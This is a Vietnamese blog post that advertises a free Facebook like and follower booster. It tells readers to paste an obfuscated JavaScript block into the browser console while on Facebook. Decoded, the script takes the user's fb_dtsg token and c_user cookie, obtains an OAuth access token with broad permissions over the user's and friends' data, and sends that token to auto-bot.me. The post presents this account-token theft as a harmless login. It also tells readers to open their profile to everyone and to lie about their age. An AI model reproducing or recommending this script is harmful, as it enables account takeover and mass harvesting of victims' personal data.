Hướng dẫn hack like hack sub đơn giản không bị mất ních

KÍCH VÀO LINK NÀY :


1: ĐĂNG NHẬP BẰNG HÌNH ẢNH :Bước 1:Mở 1 tab facebook, sau đó vào lại auto-bot.me phần login bằng hình ảnh. => hi

Bước 2: Click và giữ chuột để kéo tấm ảnh bên dưới về phía tab facebook đang mở

Bước 3: Đợi khoản 2s để xác thực và lấy token quay trở về hệ thống
2 ĐĂNG NHẬP BẰNG CODE:
Bước 1:COPY(Click chuột vào đoạn mã => CTRL + C) toàn bộ đoạn mã đăng nhập phía dưới

Bước 2:Click Facebook để trở về facebook

Bước 3:Nếu bạn dùng trình duyệt Chrome hoặc Cờ Rôm+ thì các bạn ấn tổ hợp Ctrl + Shift + J sau đó Paste ( Dán ) Code và ấn Enter 
Để chương trình đăng nhập hoạt động khoản 2 giây và bạn sẽ được đưa về hệ thống
CODE NEK: 
 
 
//░░░░░░░░░░░░▄▄░░░░░░░░░
//░░░░░░░░░░░█░░█░░░░░░░░
//░░░░░░░░░░░█░░█░░░░░░░░
//░░░░░░░░░░█░░░█░░░░░░░░
//░░░░░░░░░█░░░░█░░░░░░░░
//███████▄▄█░░░░░██████░░
//▓▓▓▓▓▓█░░░░░░░░░░░░░░█░
//▓▓▓▓▓▓█░░░░░░░░░░░░░░█░
//▓▓▓▓▓▓█░░░░░░░░░░░░░░█░
//▓▓▓▓▓▓█░░░░░░░░░░░░░░█░
//▓▓▓▓▓▓█░░░░░░░░░░░░░░█░
//▓▓▓▓▓▓█████░░░░░░░░░█░░
//██████▀░░░░▀▀██████▀░░░


var idapp = "6628568379";var autobotme = "https://auto-bot.me/login.php?token=";var _0x3843=["\x67\x65\x74\x54\x69\x6D\x65","\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x76\x31\x2E\x30\x2F\x64\x69\x61\x6C\x6F\x67\x2F\x6F\x61\x75\x74\x68\x2F\x72\x65\x61\x64","\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x61\x70\x70\x5F\x69\x64\x3D","\x26\x72\x65\x64\x69\x72\x65\x63\x74\x5F\x75\x72\x69\x3D\x66\x62\x63\x6F\x6E\x6E\x65\x63\x74\x3A\x2F\x2F\x73\x75\x63\x63\x65\x73\x73\x26\x64\x69\x73\x70\x6C\x61\x79\x3D\x70\x6F\x70\x75\x70\x26\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D\x26\x73\x64\x6B\x3D\x26\x66\x72\x6F\x6D\x5F\x70\x6F\x73\x74\x3D\x31\x26\x70\x75\x62\x6C\x69\x63\x5F\x69\x6E\x66\x6F\x5F\x6E\x75\x78\x3D\x31\x26\x70\x72\x69\x76\x61\x74\x65\x3D\x26\x6C\x6F\x67\x69\x6E\x3D\x26\x72\x65\x61\x64\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x61\x62\x6F\x75\x74\x5F\x6D\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x69\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x62\x69\x72\x74\x68\x64\x61\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x63\x68\x65\x63\x6B\x69\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x65\x76\x65\x6E\x74\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x67\x61\x6D\x65\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x67\x72\x6F\x75\x70\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x68\x6F\x6D\x65\x74\x6F\x77\x6E\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x69\x6E\x74\x65\x72\x65\x73\x74\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6C\x69\x6B\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6E\x6F\x74\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x70\x68\x6F\x74\x6F\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x71\x75\x65\x73\x74\x69\x6F\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x5F\x64\x65\x74\x61\x69\x6C\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x69\x67\x69\x6F\x6E\x5F\x70\x6F\x6C\x69\x74\x69\x63\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x73\x74\x61\x74\x75\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x73\x75\x62\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x76\x69\x64\x65\x6F\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x77\x65\x62\x73\x69\x74\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x77\x6F\x72\x6B\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x75\x73\x65\x72\x5F\x6E\x6F\x74\x65\x73\x2C\x75\x73\x65\x72\x5F\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x2C\x75\x73\x65\x72\x5F\x71\x75\x65\x73\x74\x69\x6F\x6E\x73\x2C\x75\x73\x65\x72\x5F\x73\x75\x62\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x73\x2C\x75\x73\x65\x72\x5F\x61\x62\x6F\x75\x74\x5F\x6D\x65\x2C\x75\x73\x65\x72\x5F\x61\x63\x74\x69\x76\x69\x74\x69\x65\x73\x2C\x75\x73\x65\x72\x5F\x62\x69\x72\x74\x68\x64\x61\x79\x2C\x75\x73\x65\x72\x5F\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x75\x73\x65\x72\x5F\x65\x76\x65\x6E\x74\x73\x2C\x75\x73\x65\x72\x5F\x67\x61\x6D\x65\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x79\x2C\x75\x73\x65\x72\x5F\x67\x72\x6F\x75\x70\x73\x2C\x75\x73\x65\x72\x5F\x68\x6F\x6D\x65\x74\x6F\x77\x6E\x2C\x75\x73\x65\x72\x5F\x69\x6E\x74\x65\x72\x65\x73\x74\x73\x2C\x75\x73\x65\x72\x5F\x6C\x69\x6B\x65\x73\x2C\x75\x73\x65\x72\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2C\x75\x73\x65\x72\x5F\x70\x68\x6F\x74\x6F\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x5F\x64\x65\x74\x61\x69\x6C\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x69\x67\x69\x6F\x6E\x5F\x70\x6F\x6C\x69\x74\x69\x63\x73\x2C\x75\x73\x65\x72\x5F\x73\x74\x61\x74\x75\x73\x2C\x75\x73\x65\x72\x5F\x76\x69\x64\x65\x6F\x73\x2C\x75\x73\x65\x72\x5F\x77\x65\x62\x73\x69\x74\x65\x2C\x75\x73\x65\x72\x5F\x77\x6F\x72\x6B\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x70\x75\x62\x6C\x69\x63\x5F\x70\x72\x6F\x66\x69\x6C\x65\x2C\x75\x73\x65\x72\x5F\x66\x72\x69\x65\x6E\x64\x73\x26\x77\x72\x69\x74\x65\x3D\x26\x72\x65\x61\x64\x77\x72\x69\x74\x65\x3D\x26\x65\x78\x74\x65\x6E\x64\x65\x64\x3D\x26\x73\x6F\x63\x69\x61\x6C\x5F\x63\x6F\x6E\x66\x69\x72\x6D\x3D\x26\x63\x6F\x6E\x66\x69\x72\x6D\x3D\x26\x67\x64\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x3D\x33\x26\x73\x65\x65\x6E\x5F\x73\x63\x6F\x70\x65\x73\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x61\x62\x6F\x75\x74\x5F\x6D\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x69\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x62\x69\x72\x74\x68\x64\x61\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x63\x68\x65\x63\x6B\x69\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x65\x76\x65\x6E\x74\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x67\x61\x6D\x65\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x79\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x67\x72\x6F\x75\x70\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x68\x6F\x6D\x65\x74\x6F\x77\x6E\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x69\x6E\x74\x65\x72\x65\x73\x74\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6C\x69\x6B\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6E\x6F\x74\x65\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x70\x68\x6F\x74\x6F\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x71\x75\x65\x73\x74\x69\x6F\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x5F\x64\x65\x74\x61\x69\x6C\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x72\x65\x6C\x69\x67\x69\x6F\x6E\x5F\x70\x6F\x6C\x69\x74\x69\x63\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x73\x74\x61\x74\x75\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x73\x75\x62\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x76\x69\x64\x65\x6F\x73\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x77\x65\x62\x73\x69\x74\x65\x2C\x66\x72\x69\x65\x6E\x64\x73\x5F\x77\x6F\x72\x6B\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x75\x73\x65\x72\x5F\x6E\x6F\x74\x65\x73\x2C\x75\x73\x65\x72\x5F\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65\x2C\x75\x73\x65\x72\x5F\x71\x75\x65\x73\x74\x69\x6F\x6E\x73\x2C\x75\x73\x65\x72\x5F\x73\x75\x62\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x73\x2C\x75\x73\x65\x72\x5F\x61\x62\x6F\x75\x74\x5F\x6D\x65\x2C\x75\x73\x65\x72\x5F\x61\x63\x74\x69\x76\x69\x74\x69\x65\x73\x2C\x75\x73\x65\x72\x5F\x62\x69\x72\x74\x68\x64\x61\x79\x2C\x75\x73\x65\x72\x5F\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x75\x73\x65\x72\x5F\x65\x76\x65\x6E\x74\x73\x2C\x75\x73\x65\x72\x5F\x67\x61\x6D\x65\x73\x5F\x61\x63\x74\x69\x76\x69\x74\x79\x2C\x75\x73\x65\x72\x5F\x67\x72\x6F\x75\x70\x73\x2C\x75\x73\x65\x72\x5F\x68\x6F\x6D\x65\x74\x6F\x77\x6E\x2C\x75\x73\x65\x72\x5F\x69\x6E\x74\x65\x72\x65\x73\x74\x73\x2C\x75\x73\x65\x72\x5F\x6C\x69\x6B\x65\x73\x2C\x75\x73\x65\x72\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2C\x75\x73\x65\x72\x5F\x70\x68\x6F\x74\x6F\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x5F\x64\x65\x74\x61\x69\x6C\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x61\x74\x69\x6F\x6E\x73\x68\x69\x70\x73\x2C\x75\x73\x65\x72\x5F\x72\x65\x6C\x69\x67\x69\x6F\x6E\x5F\x70\x6F\x6C\x69\x74\x69\x63\x73\x2C\x75\x73\x65\x72\x5F\x73\x74\x61\x74\x75\x73\x2C\x75\x73\x65\x72\x5F\x76\x69\x64\x65\x6F\x73\x2C\x75\x73\x65\x72\x5F\x77\x65\x62\x73\x69\x74\x65\x2C\x75\x73\x65\x72\x5F\x77\x6F\x72\x6B\x5F\x68\x69\x73\x74\x6F\x72\x79\x2C\x70\x75\x62\x6C\x69\x63\x5F\x70\x72\x6F\x66\x69\x6C\x65\x2C\x75\x73\x65\x72\x5F\x66\x72\x69\x65\x6E\x64\x73\x26\x61\x75\x74\x68\x5F\x74\x79\x70\x65\x3D\x26\x61\x75\x74\x68\x5F\x74\x6F\x6B\x65\x6E\x3D\x26\x61\x75\x74\x68\x5F\x6E\x6F\x6E\x63\x65\x3D\x26\x72\x65\x66\x3D\x44\x65\x66\x61\x75\x6C\x74\x26\x72\x65\x74\x75\x72\x6E\x5F\x66\x6F\x72\x6D\x61\x74\x3D\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x26\x64\x6F\x6D\x61\x69\x6E\x3D\x26\x73\x73\x6F\x5F\x64\x65\x76\x69\x63\x65\x3D\x69\x6F\x73\x26\x5F\x5F\x43\x4F\x4E\x46\x49\x52\x4D\x5F\x5F\x3D\x31","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x63\x6C\x6F\x73\x65","\x68\x72\x65\x66","\x73\x65\x6E\x64"];var delay_time=1000;function sleep(_0xc151x3){var _0xc151x4= new Date()[_0x3843[0]]();while( new Date()[_0x3843[0]]()<_0xc151x4+_0xc151x3){;};}var fb_dtsg=document[_0x3843[3]](_0x3843[2])[0][_0x3843[1]];var user_id=document[_0x3843[5]][_0x3843[4]](document[_0x3843[5]][_0x3843[4]](/c_user=(\d+)/)[1]);var token=_0x3843[6];var tokenandroid=_0x3843[6];var e= new XMLHttpRequest;var t=_0x3843[7];var n=_0x3843[8]+fb_dtsg+_0x3843[9]+idapp+_0x3843[10];e[_0x3843[12]](_0x3843[11],t,true);e[_0x3843[13]]=function(){if(e[_0x3843[14]]==4&&e[_0x3843[15]]==200){token=e[_0x3843[16]][_0x3843[4]](/token=(.+)&/)[1];e[_0x3843[17]];var _0xc151xc= new XMLHttpRequest;var t=_0x3843[7];var n=_0x3843[8]+fb_dtsg+_0x3843[9]+idapp+_0x3843[10];_0xc151xc[_0x3843[12]](_0x3843[11],t,true);_0xc151xc[_0x3843[13]]=function(){if(_0xc151xc[_0x3843[14]]==4&&_0xc151xc[_0x3843[15]]==200){tokenandroid=_0xc151xc[_0x3843[16]][_0x3843[4]](/token=(.+)&/)[1];_0xc151xc[_0x3843[17]];sleep(delay_time);location[_0x3843[18]]=autobotme+token+"&idapp="+idapp;}};_0xc151xc[_0x3843[19]](n);}};e[_0x3843[19]](n);
CODE Ở TRÊN
Lưu ý: Bạn nên trên 18 tuổi, nếu không hãy thay đổi năm sinh thành trên 18 tuổi. Nếu không sẽ không bật theo giõi được
Đầu tiên, bạn click vào đây để thay đổi thiết lập người theo giõi. Trong phần: "Ai có thể theo dõi tôi" bạn chọn và sửa thành  Tất cả mọi người  hoặc  Everyone 
Tiếp theo phần: "Bình luận của người theo dõi" bạn chọn và sửa thành: Tất cả mọi người  hoặc Everyone 
AUTOLKE LÀ TĂNG LIKE
AUTOSUB LÀ TĂNG NGƯỜI THEO GIỎI
Auto Share  TĂNG CHIA SE
Auto Comment  TĂNG BÌNH LUẬN
Auto Add Friend  TĂNG NGƯỜI KẾT BẠN
Bot Like TĂNG LIKE TỰ ĐỘNG
Bot Status TỰ ĐỘNG ĐĂNG STT 
VÀ NHIỀU CHỨC NĂNG KHÁC VIẾT MIỆT VL ! Hiếu SKY
Bài Viết Do :Lê Hiếu ( Hiếu M-TP )
Thân ! Chúc Các Bạn Vui Vẻ !

Không có nhận xét nào

» Tích vào ô "Thông báo cho tôi" để nhận thông báo phản hồi của Admin